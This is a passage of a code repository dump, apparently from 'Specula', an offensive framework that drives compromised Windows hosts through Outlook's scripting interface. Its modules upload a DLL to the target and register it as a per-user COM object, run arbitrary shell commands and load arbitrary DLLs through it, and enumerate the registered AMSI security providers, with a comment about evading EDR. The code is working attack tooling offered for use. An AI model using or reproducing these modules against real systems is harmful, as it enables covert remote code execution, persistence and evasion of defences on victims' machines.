const IID LIBID_SpeculaApiLib;\r\n\r\nEXTERN_C const CLSID CLSID_Sepcula;\r\n\r\n#ifdef __cplusplus\r\n\r\nclass DECLSPEC_UUID(\"e8b55279-c6b4-48f3-8138-b727337c0236\")\r\nSepcula;\r\n#endif\r\n#endif /* __SpeculaApiLib_LIBRARY_DEFINED__ */\r\n\r\n/* Additional Prototypes for ALL interfaces */\r\n\r\nunsigned long __RPC_USER BSTR_UserSize( unsigned long *, unsigned long , BSTR * ); \r\nunsigned char * __RPC_USER BSTR_UserMarshal( unsigned long *, unsigned char *, BSTR * ); \r\nunsigned char * __RPC_USER BSTR_UserUnmarshal(unsigned long *, unsigned char *, BSTR * ); \r\nvoid __RPC_USER BSTR_UserFree( unsigned long *, BSTR * ); \r\n\r\nunsigned long __RPC_USER VARIANT_UserSize( unsigned long *, unsigned long , VARIANT * ); \r\nunsigned char * __RPC_USER VARIANT_UserMarshal( unsigned long *, unsigned char *, VARIANT * ); \r\nunsigned char * __RPC_USER VARIANT_UserUnmarshal(unsigned long *, unsigned char *, VARIANT * ); \r\nvoid __RPC_USER VARIANT_UserFree( unsigned long *, VARIANT * ); \r\n\r\nunsigned long __RPC_USER BSTR_UserSize64( unsigned long *, unsigned long , BSTR * ); \r\nunsigned char * __RPC_USER BSTR_UserMarshal64( unsigned long *, unsigned char *, BSTR * ); \r\nunsigned char * __RPC_USER BSTR_UserUnmarshal64(unsigned long *, unsigned char *, BSTR * ); \r\nvoid __RPC_USER BSTR_UserFree64( unsigned long *, BSTR * ); \r\n\r\nunsigned long __RPC_USER VARIANT_UserSize64( unsigned long *, unsigned long , VARIANT * ); \r\nunsigned char * __RPC_USER VARIANT_UserMarshal64( unsigned long *, unsigned char *, VARIANT * ); \r\nunsigned char * __RPC_USER VARIANT_UserUnmarshal64(unsigned long *, unsigned char *, VARIANT * ); \r\nvoid __RPC_USER VARIANT_UserFree64( unsigned long *, VARIANT * ); \r\n\r\n/* end of Additional Prototypes */\r\n\r\n#ifdef __cplusplus\r\n}\r\n#endif\r\n\r\n#endif\r\n\r\n\r\n" }, { "path": "api/SpeculaApi/SpeculaApips.def", "content": "\r\nLIBRARY\r\n\r\nEXPORTS\r\n\tDllGetClassObject\t\tPRIVATE\r\n\tDllCanUnloadNow\t\t\tPRIVATE\r\n\tDllRegisterServer\t\tPRIVATE\r\n\tDllUnregisterServer\t\tPRIVATE\r\n" }, { "path": "api/SpeculaApi/dllmain.cpp", "content": "// dllmain.cpp : Implementation of DllMain.\r\n\r\n#include \"pch.h\"\r\n#include \"framework.h\"\r\n#include \"resource.h\"\r\n#include \"SpeculaApi_i.h\"\r\n#include \"dllmain.h\"\r\n\r\nCSpeculaApiModule _AtlModule;\r\n\r\n// DLL Entry Point\r\nextern \"C\" BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)\r\n{\r\n\thInstance;\r\n\treturn _AtlModule.DllMain(dwReason, lpReserved);\r\n}\r\n" }, { "path": "api/SpeculaApi/dllmain.h", "content": "// dllmain.h : Declaration of module class.\r\n\r\nclass CSpeculaApiModule : public ATL::CAtlDllModuleT< CSpeculaApiModule >\r\n{\r\npublic :\r\n\tDECLARE_LIBID(LIBID_SpeculaApiLib)\r\n\tDECLARE_REGISTRY_APPID_RESOURCEID(IDR_SPECULAAPI, \"{5be8ef76-6253-482a-926e-d1d877de3b63}\")\r\n};\r\n\r\nextern class CSpeculaApiModule _AtlModule;\r\n" }, { "path": "api/SpeculaApi/framework.h", "content": "#pragma once\r\n\r\n#ifndef STRICT\r\n#define STRICT\r\n#endif\r\n\r\n#include \"targetver.h\"\r\n\r\n#define _ATL_APARTMENT_THREADED\r\n\r\n#define _ATL_NO_AUTOMATIC_NAMESPACE\r\n\r\n#define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS\t// some CString constructors will be explicit\r\n\r\n\r\n#define ATL_NO_ASSERT_ON_DESTROY_NONEXISTENT_WINDOW\r\n\r\n#include \"resource.h\"\r\n#include \r\n#include \r\n#include \r\n" }, { "path": "api/SpeculaApi/pch.cpp", "content": "// pch.cpp: source file corresponding to the pre-compiled header\r\n\r\n#include \"pch.h\"\r\n\r\n// When you are using pre-compiled headers, this source file is necessary for compilation to succeed.\r\n" }, { "path": "api/SpeculaApi/pch.h", "content": "// pch.h: This is a precompiled header file.\r\n// Files listed below are compiled only once, improving build performance for future builds.\r\n// This also affects IntelliSense performance, including code completion and many code browsing features.\r\n// However, files listed here are ALL re-compiled if any one of them is updated between builds.\r\n// Do not add files here that you will be updating frequently as this negates the performance advantage.\r\n\r\n#ifndef PCH_H\r\n#define PCH_H\r\n\r\n// add headers that you want to pre-compile here\r\n#include \"framework.h\"\r\n\r\n#endif //PCH_H\r\n" }, { "path": "api/SpeculaApi/resource.h", "content": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by SpeculaApi.rc\r\n//\r\n#define IDS_PROJNAME 100\r\n#define IDR_SPECULAAPI 101\r\n#define IDR_SEPCULA 106\r\n\r\n// Next default values for new objects\r\n// \r\n#ifdef APSTUDIO_INVOKED\r\n#ifndef APSTUDIO_READONLY_SYMBOLS\r\n#define _APS_NEXT_RESOURCE_VALUE 201\r\n#define _APS_NEXT_COMMAND_VALUE 32768\r\n#define _APS_NEXT_CONTROL_VALUE 201\r\n#define _APS_NEXT_SYMED_VALUE 107\r\n#endif\r\n#endif\r\n" }, { "path": "api/SpeculaApi/targetver.h", "content": "#pragma once\r\n\r\n// Including SDKDDKVer.h defines the highest available Windows platform.\r\n\r\n// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and\r\n// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.\r\n\r\n#include \r\n" }, { "path": "api/SpeculaApi.sln", "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.7.34202.233\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"SpeculaApi\", \"SpeculaApi\\SpeculaApi.vcxproj\", \"{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}\"\r\nEndProject\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"SpeculaApiPS\", \"SpeculaApiPS\\SpeculaApiPS.vcxproj\", \"{B58767EE-5185-4E99-818F-6285332400E6}\"\r\n\tProjectSection(ProjectDependencies) = postProject\r\n\t\t{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB} = {AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}\r\n\tEndProjectSection\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Release|x64.Build.0 = Release|x64\r\n\t\t{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Release|x86.Build.0 = Release|Win32\r\n\t\t{B58767EE-5185-4E99-818F-6285332400E6}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{B58767EE-5185-4E99-818F-6285332400E6}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{B58767EE-5185-4E99-818F-6285332400E6}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{B58767EE-5185-4E99-818F-6285332400E6}.Release|x86.ActiveCfg = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {98C14C87-B4F7-4E1C-B61E-D945B7763368}\r\n\tEndGlobalSection\r\nEndGlobal\r\n" }, { "path": "api/SpeculaApiPS/SpeculaApiPS.vcxproj", "content": "\r\n\r\n \r\n \r\n Debug\r\n Win32\r\n \r\n \r\n Release\r\n Win32\r\n \r\n \r\n Debug\r\n x64\r\n \r\n \r\n Release\r\n x64\r\n \r\n \r\n \r\n 17.0\r\n {B58767EE-5185-4E99-818F-6285332400E6}\r\n 10.0\r\n AtlPSProj\r\n \r\n \r\n \r\n DynamicLibrary\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n DynamicLibrary\r\n false\r\n v143\r\n Unicode\r\n \r\n \r\n DynamicLibrary\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n DynamicLibrary\r\n false\r\n v143\r\n Unicode\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $(Configuration)PS\\\r\n \r\n \r\n $(Configuration)PS\\\r\n \r\n \r\n $(Configuration)PS\\\r\n \r\n \r\n $(Configuration)PS\\\r\n \r\n \r\n \r\n REGISTER_PROXY_DLL;_DEBUG;%(PreprocessorDefinitions)\r\n \r\n \r\n kernel32.lib;rpcns4.lib;rpcrt4.lib;oleaut32.lib;uuid.lib;%(AdditionalDependencies)\r\n SpeculaApiPS.def\r\n true\r\n true\r\n \r\n \r\n if exist dlldata.c goto :END\r\necho Error: MIDL will not generate DLLDATA.C unless you have at least 1 interface in the main project.\r\nExit 1\r\n:END\r\n\r\n Checking for required files\r\n \r\n \r\n \r\n \r\n WIN32;REGISTER_PROXY_DLL;_DEBUG;%(PreprocessorDefinitions)\r\n \r\n \r\n kernel32.lib;rpcns4.lib;rpcrt4.lib;oleaut32.lib;uuid.lib;%(AdditionalDependencies)\r\n SpeculaApiPS.def\r\n true\r\n \r\n \r\n if exist dlldata.c goto :END\r\necho Error: MIDL will not generate DLLDATA.C unless you have at least 1 interface in the main project.\r\nExit 1\r\n:END\r\n\r\n Checking for required files\r\n \r\n \r\n \r\n \r\n WIN32;REGISTER_PROXY_DLL;NDEBUG;%(PreprocessorDefinitions)\r\n MaxSpeed\r\n \r\n \r\n kernel32.lib;rpcns4.lib;rpcrt4.lib;oleaut32.lib;uuid.lib;%(AdditionalDependencies)\r\n SpeculaApiPS.def\r\n true\r\n true\r\n true\r\n \r\n \r\n if exist dlldata.c goto :END\r\necho Error: MIDL will not generate DLLDATA.C unless you have at least 1 interface in the main project.\r\nExit 1\r\n:END\r\n\r\n Checking for required files\r\n \r\n \r\n \r\n \r\n REGISTER_PROXY_DLL;NDEBUG;%(PreprocessorDefinitions)\r\n MaxSpeed\r\n \r\n \r\n kernel32.lib;rpcns4.lib;rpcrt4.lib;oleaut32.lib;uuid.lib;%(AdditionalDependencies)\r\n SpeculaApiPS.def\r\n true\r\n true\r\n true\r\n true\r\n \r\n \r\n if exist dlldata.c goto :END\r\necho Error: MIDL will not generate DLLDATA.C unless you have at least 1 interface in the main project.\r\nExit 1\r\n:END\r\n\r\n Checking for required files\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "api/SpeculaApiPS/SpeculaApiPS.vcxproj.filters", "content": "\r\n\r\n \r\n \r\n {3be6a7fa-d612-40eb-b2df-d2d4ff8b27b2}\r\n False\r\n \r\n \r\n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\r\n cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx\r\n \r\n \r\n {93995380-89BD-4b04-88EB-625FBE52EBFB}\r\n h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd\r\n \r\n \r\n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\r\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\r\n \r\n \r\n \r\n \r\n Source Files\r\n \r\n \r\n \r\n \r\n Generated Files\r\n \r\n \r\n Generated Files\r\n \r\n \r\n Generated Files\r\n \r\n \r\n" }, { "path": "functions/api/install_api.py", "content": "import copy\nimport os\n\nfrom lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,makebool\nfrom lib.core.utility import TaskClass\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Sets reg keys to install com object to interface with Windows API. \n This module uploads the OutlookHelper DLL file automatically (Queued as tasks).\n In order to leverage the API modules you need to run the api_verify at least once so that the verification\n process runs on target and updates the specula database.\n \"\"\"\n self.entry = 'install_api'\n self.depends = ['./helperFunctions/Setregvalue_hkcu.txt']\n self.options['file'] = {\n \"value\": \"c:\\\\com-test\\\\v2\\\\specula_com.dll\",\n \"required\": True,\n \"description\": \"Where to upload and register api dll\",\n \"handler\": quotedstring\n }\n self.options['addverifytask'] = {\n \"value\": \"True\",\n \"required\": True,\n \"description\": \"Will add the verify task as the next task if this is set to true.\",\n \"handler\": makebool\n }\n super().__init__(templatepath)\n\n def rethandler(self, agent, options, data):\n # Updating DB with the dll paths used and setting installed to true and verified to False\n arch = data[:2]\n\n localdll = None\n basefile = \"SpeculaApi\"\n if arch == \"64\":\n localdll = os.path.join(self.helpers.getpayloaddir(), \"api/\" + basefile + \".x64.dll\")\n self.helpers.speclog(\"Identified 64 bit office install, uploading 64 bit dll\", False)\n agent.officearch = \"x64\"\n elif arch == \"32\":\n localdll = os.path.join(self.helpers.getpayloaddir(), \"api/\" + basefile + \".dll\")\n self.helpers.speclog(\"Identified 32 bit office install, uploading 32 bit dll\", False)\n agent.officearch = \"x86\"\n else:\n self.helpers.speclog(\"Failed to detect office arch, api install failed\", True)\n mod = self.helpers.get_module('api/remove_api')\n mod.options['deletedlls']['value'] = \"False\"\n task = TaskClass('api/remove_api',\n self.helpers.renderModule(mod, agent),\n mod.entry,\n copy.deepcopy(mod.options),\n True)\n agent.add_task(task)\n return\n\n # Add task to create the folder - Just in case\n folderpath = (options['file']['value']).rsplit('\\\\', 1)[0] #remove filename from path\n mod = self.helpers.get_module('operation/file/create_dir')\n mod.options['directory']['value'] = folderpath\n task = TaskClass('operation/file/create_dir',\n self.helpers.renderModule(mod, agent),\n mod.entry,\n copy.deepcopy(mod.options),\n True)\n agent.add_task(task)\n \n #queue dll upload\n mod = self.helpers.get_module('operation/file/put_file')\n mod.options['file']['value'] = localdll\n mod.options['destination']['value'] = options['file']['value']\n task = TaskClass('operation/file/put_file',\n self.helpers.renderModule(mod, agent),\n mod.entry,\n copy.deepcopy(mod.options),\n True)\n agent.add_task(task)\n agent.api_dll = options['file']['value']\n agent.api_installed = True\n if options['addverifytask']['value']:\n mod = self.helpers.get_module('api/verify_api')\n task = TaskClass('api/verify_api',\n self.helpers.renderModule(mod, agent),\n mod.entry,\n {},\n True)\n agent.add_task(task)" }, { "path": "functions/api/install_api.txt", "content": "\r\nFunction install_api()\r\n\tOn Error Resume Next\r\n\tis64 = false\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objreg = objLocator.ConnectServer(\".\", \"root\\cimv2\").Get(\"StdRegProv\")\r\n\tobjreg.GetStringValue 2147483650, \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\outlook.exe\", \"Path\", strPath\r\n\tif InStr(strPath, \"x86\") > 0 Then\r\n\t\tSetValue_HKCU_Registry = \"32\"\r\n\telse\r\n\t\tSetValue_HKCU_Registry = \"64\"\r\n\t\tis64 = true\r\n\tend if\r\n\tbasepath = \"software\\classes\\\"\r\n SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"SpeculaApi.Specula\", \"REG_SZ\", \"@\", \"Specula class\") & vbCrLf\r\n SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"SpeculaApi.Specula\\CurVer\", \"REG_SZ\", \"@\", \"SpeculaApi.Specula.1\") & vbCrLf\r\n\tSetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"SpeculaApi.Specula.1\", \"REG_SZ\", \"@\", \"Specula class\") & vbCrLf\r\n SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"SpeculaApi.Specula.1\\CLSID\", \"REG_SZ\", \"@\", \"{e8b55279-c6b4-48f3-8138-b727337c0236}\") & vbCrLf\r\n\r\n SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"CLSID\\{e8b55279-c6b4-48f3-8138-b727337c0236}\", \"REG_SZ\", \"@\", \"Specula class\") & vbCrLf\r\n SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"CLSID\\{e8b55279-c6b4-48f3-8138-b727337c0236}\\InprocServer32\", \"REG_SZ\", \"@\", {{file}}) & vbCrLf\r\n SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"CLSID\\{e8b55279-c6b4-48f3-8138-b727337c0236}\\InprocServer32\", \"REG_SZ\", \"ThreadingModel\", \"Free\") & vbCrLf\r\n\r\n SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"CLSID\\{e8b55279-c6b4-48f3-8138-b727337c0236}\\ProgId\", \"REG_SZ\", \"@\", \"SpeculaApi.Specula.1\") & vbCrLf\r\n SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"CLSID\\{e8b55279-c6b4-48f3-8138-b727337c0236}\\Programmable\", \"REG_SZ\", \"@\", \"\") & vbCrLf\r\n\tSetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"CLSID\\{e8b55279-c6b4-48f3-8138-b727337c0236}\\TypeLib\", \"REG_SZ\", \"@\", \"{5be8ef76-6253-482a-926e-d1d877de3b63}\") & vbCrLf\r\n SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"CLSID\\{e8b55279-c6b4-48f3-8138-b727337c0236}\\Version\", \"REG_SZ\", \"@\", \"1.0\") & vbCrLf\r\n SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"CLSID\\{e8b55279-c6b4-48f3-8138-b727337c0236}\\VersionIndependentProgID\", \"REG_SZ\", \"@\", \"SpeculaApi.Specula\") & vbCrLf\r\n\t\r\n\tSetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"TypeLib\\{5be8ef76-6253-482a-926e-d1d877de3b63}\\1.0\", \"REG_SZ\", \"@\", \"SpeculaApiLib\") & vbCrLf\r\n\tSetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"TypeLib\\{5be8ef76-6253-482a-926e-d1d877de3b63}\\1.0\\FLAGS\", \"REG_SZ\", \"@\", \"0\") & vbCrLf\r\n\tSetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"TypeLib\\{5be8ef76-6253-482a-926e-d1d877de3b63}\\1.0\\0\\win32\", \"REG_SZ\", \"@\", {{file}}) & vbCrLf\r\n\tif (is64) then\r\n\t SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"TypeLib\\{5be8ef76-6253-482a-926e-d1d877de3b63}\\1.0\\0\\win64\", \"REG_SZ\", \"@\", {{file}}) & vbCrLf\r\n\tend if\r\n\r\n\tSetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"Interface\\{B0F5F947-8064-48F7-A623-5C058DC91CC8}\", \"REG_SZ\", \"@\", \"ISepcula\") & vbCrLf\r\n\tSetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"Interface\\{B0F5F947-8064-48F7-A623-5C058DC91CC8}\\ProxyStubClsid32\", \"REG_SZ\", \"@\", \"{00020424-0000-0000-C000-000000000046}\") & vbCrLf\r\n\tSetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"Interface\\{B0F5F947-8064-48F7-A623-5C058DC91CC8}\\TypeLib\", \"REG_SZ\", \"@\", \"{5be8ef76-6253-482a-926e-d1d877de3b63}\") & vbCrLf\r\n\tSetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + \"Interface\\{B0F5F947-8064-48F7-A623-5C058DC91CC8}\\TypeLib\", \"REG_SZ\", \"Version\", \"1.0\") & vbCrLf\r\n\r\n\tinstall_api = SetValue_HKCU_Registry\r\nEnd Function" }, { "path": "functions/api/load_dll.py", "content": "from lib.core.specmodule import SpecModule\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\nLoads a dll from disk using LoadLibrary\n \"\"\"\n self.entry = 'load_dll'\n self.depends = []\n self.options['dll'] = {\n \"value\": None,\n \"required\": True,\n \"description\": \"dll to load\",\n \"handler\": None\n }\n super().__init__(templatepath)\n\n def preprocess(self, agent):\n if agent.api_verified != True:\n raise RuntimeError(\"API has not been verified, please run api_verify first to check that the API is working\\nIf it works it will mark the attribute api_verified to True\\nTo override you would need to use dbedit to change the value to true\")\n" }, { "path": "functions/api/load_dll.txt", "content": "Function load_dll\n on error resume next\n Set SpeculaApi = window.external.OutlookApplication.CreateObject(\"SpeculaApi.Specula\")\n if SpeculaApi.LoadDll(\"{{dll}}\") = 1 Then\n load_dll = \"True\"\n Else\n load_dll = \"False\"\n End If\nEnd Function\n" }, { "path": "functions/api/remove_api.py", "content": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,makebool\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Removes the registry values set by the install_outlookhelperapi.\n\n \"\"\"\n self.entry = 'remove_api'\n self.depends = ['./helperFunctions/Delregkey_hkcu.txt', './helperFunctions/Delregvalue_hkcu.txt']\n self.options['deletedlls'] = {\n \"value\": \"True\",\n \"required\": True,\n \"description\": \"Attempt to delete dll from disk, won't work if its been loaded into outlook\",\n \"handler\": makebool\n }\n self.options['dll'] = {\n \"value\": \"autoresolve\",\n \"required\": True,\n \"description\": \"Path to file on disk, let it be autoresolve to find path in specula db\",\n \"handler\": quotedstring\n }\n super().__init__(templatepath)\n \n def preprocess(self, agent):\n if self.options['deletedlls']['value'] == \"True\":\n if self.options['dll']['value'] == \"autoresolve\":\n if agent.api_dll:\n self.options['dll']['value'] = agent.api_dll\n else:\n raise RuntimeError(\"No value found in Specula DB for api_dll - Rerun and specify path manually or set deletedlls to False\")\n\n def rethandler(self, agent, options, data):\n # Updating DB with the dll paths used and setting installed to true and verified to False\n agent.api_dll = None\n agent.api_installed = False\n agent.api_verified = False\n " }, { "path": "functions/api/remove_api.txt", "content": "\r\nFunction remove_api()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet fs = window.external.OutlookApplication.CreateObject(\"Scripting.FileSystemObject\")\r\n\tbasepath = \"software\\classes\\\"\r\n\t\r\n\tregdelres = DelRegKey_HKCU(basepath + \"OutLookHelper.Sysinfo\") & vbCrlf\r\n\tregdelres = regdelres & DelRegKey_HKCU(basepath + \"SpeculaApi.Specula.1\") & vbCrlf\r\n\tregdelres = regdelres & DelRegKey_HKCU(basepath + \"CLSID\\{e8b55279-c6b4-48f3-8138-b727337c0236}\") & vbCrlf\r\n\tregdelres = regdelres & DelRegKey_HKCU(basepath + \"TypeLib\\{5be8ef76-6253-482a-926e-d1d877de3b63}\") & vbCrlf\r\n\tregdelres = regdelres & DelRegKey_HKCU(basepath + \"Interface\\{e8b55279-c6b4-48f3-8138-b727337c0236}\") & vbCrlf\r\n\t\r\n\tif {{deletedlls}} = True Then\r\n\t\t\r\n\t\tIf fs.FileExists({{dll}}) = True Then\r\n\t\t\tfs.DeleteFile {{dll}}\r\n\t\telse\r\n\t\tEnd If\r\n\r\n\t\tIf fs.FileExists({{dll}}) = True Then\r\n\t\t\tfiledelres = filedelres & \"Delete file: \" & {{dll}} & \" - Fail\" & vbCrlf\r\n\t\telse\r\n\t\t\tfiledelres = filedelres & \"Delete file: \" & {{dll}} & \" - Success!\" & vbCrlf\r\n\t\tEnd If\r\n\t\tremove_api = regdelres & filedelres\r\n\telse\r\n\t\tremove_api = regdelres\r\n\tEnd if\r\n\r\n \r\nEnd Function" }, { "path": "functions/api/run_shell.py", "content": "from lib.core.specmodule import SpecModule\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\nRun a basic shell command via the installed com object\n \"\"\"\n self.entry = 'run_shell_api'\n self.depends = []\n self.options['cmd'] = {\n \"value\": None,\n \"required\": True,\n \"description\": \"Command to execute\",\n \"handler\": None\n }\n super().__init__(templatepath)\n\n def preprocess(self, agent):\n if agent.api_verified != True:\n raise RuntimeError(\"API has not been verified, please run api_verify first to check that the API is working\\nIf it works it will mark the attribute api_verified to True\\nTo override you would need to use dbedit to change the value to true\")\n" }, { "path": "functions/api/run_shell.txt", "content": "Function run_shell_api()\n on error resume next\n Set SpeculaApi = window.external.OutlookApplication.CreateObject(\"SpeculaApi.Specula\")\n run_shell_api = SpeculaApi.RunShell(\"{{cmd}}\")\nEnd Function" }, { "path": "functions/api/verify_api.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Checks if the API is working or not. If this returns an error you should investigate the api installation.\n 1. Is the dll present on system? The dll paths pushed through the install_api module can be found under info/dbdata.\n 2. Is the necesarry registry keys present on the host?\n 3. Consider re-running the api_install\n 4. Could it be an EDR blocking you :INSERT SCREAMING GIF HERE:\n \"\"\"\n self.entry = 'api_verify'\n self.depends = []\n super().__init__(templatepath)\n \n def rethandler(self, agent, options, data):\n if data == \"False\":\n agent.api_verified = False\n if data == \"True\":\n agent.api_verified = True" }, { "path": "functions/api/verify_api.txt", "content": "Function api_verify()\n On error resume next\n Set specApi = window.external.OutlookApplication.CreateObject(\"SpeculaApi.Specula\")\n If IsObject(specApi) Then\n api_verify = True\n else\n api_verify = False\n End if\nEnd Function" }, { "path": "functions/enumerate/host/list_amsiproviders.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the AMSI Providers registered on the system.\n Based on MS documentation: \n https://techcommunity.microsoft.com/t5/exchange-team-blog/more-about-amsi-integration-with-exchange-server/ba-p/2572371\n Gets the GUID and figures out the names from the Classes\\\\guid table in registry\n \n It uses WbemScripting.SWbemNamedValueSet\n - Add\n - Add.__ProviderArchitecture\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - ConnectServer(root\\cimv2).EnumKey\n - ConnectServer(root\\cimv2).GetStringValue\n \"\"\"\n self.entry = 'list_amsiproviders'\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_amsiproviders.txt", "content": "Function list_amsiproviders()\r\n\tOn error resume next\r\n\tconst REG_SZ = 1\r\n\tconst REG_EXPAND_SZ = 2\r\n\tconst REG_BINARY = 3\r\n\tconst REG_DWORD = 4\r\n\tconst REG_MULTI_SZ = 7\r\n\tconst REG_QWORD = 11\r\n\r\n\tmyoutput = \"Registered AMSI providers found on system:\" & vbCrLf\r\n\tSet oCtx = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemNamedValueSet\")\r\n\toCtx.Add \"__ProviderArchitecture\", 64\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objreg = objLocator.ConnectServer(\".\",\"root\\cimv2\",\"\",\"\",,,,oCtx).Get(\"StdRegProv\")\r\n\tobjreg.EnumKey 2147483650, \"Software\\Microsoft\\AMSI\\Providers\", arrKeys\r\n\tFor Each subkey in arrKeys\r\n\t\tmyoutput = myoutput & \"Provider guid: \" & subkey & vbCrLf\r\n\t\tobjReg.GetStringValue 2147483650,\"Software\\Classes\\CLSID\\\" & subkey,\"\",strValue\r\n\t\tmyoutput = myoutput & \"CLSID name: \" & strValue & vbCrLf & vbCrLf\r\n\tNext\r\n\tlist_amsiproviders = myoutput\r\nEnd Function" }, { "path": 